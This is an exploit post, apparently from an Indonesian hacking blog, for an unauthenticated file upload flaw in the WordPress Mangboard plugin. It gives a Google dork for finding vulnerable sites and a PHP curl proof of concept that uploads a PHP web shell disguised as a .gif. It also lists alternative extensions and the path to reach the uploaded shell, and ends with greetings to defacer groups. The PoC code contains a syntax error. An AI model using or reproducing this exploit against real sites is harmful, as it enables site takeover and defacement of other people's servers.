Wordpress Mangboard Plugins File Upload Vulnerability

# Exploit Title: Wordpress Mangboard Plugins File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/mangboard/
# Date: 16-04-2017
# Exploit Author: Isal Dot ID
# Vendor Homepage: https://srd.wordpress.org/plugins/mangboard/
# Version: webapps
# Tested on: Windows 7

1. Description
You can upload files without acces as author

2. Proof of Concept

<?php

$uploadfile="yourfile.php.gif"; you can change php5 , phtml , php.fla etc
$ch = curl_init("http://127.0.0.1/wp-admin/admin-ajax.php?mode=basic&action=mb_uploader");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>


atau pake CSRF Online : DISINI
isi Postname dengan = Filedata

Path shell : /wp-content/uploads/mangboard/years/month/random nomor/random_yourshell.php.gif

Greetz : Strlen - Jje Incovers - ReC0ded - Pak Haxor - Ice-cream - Panataran - ex-Sh1Ne - Malaikat_Galau - ViruzTomcat - AdrElite - Wonka - Sh0uT0u7 - l0c4lh34rtz - Zombie-Root - KONSLET

Thanks To : Sanjungan Jiwa Team - Indonesian Defacer Tersakiti - Jembut Loyality - IndoXploit - Suram Crew - Extreme Crew - Bahari Trouble Maker - Indonesian People

Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,

Share this article please, on :

Share on fb Tweet Share on G+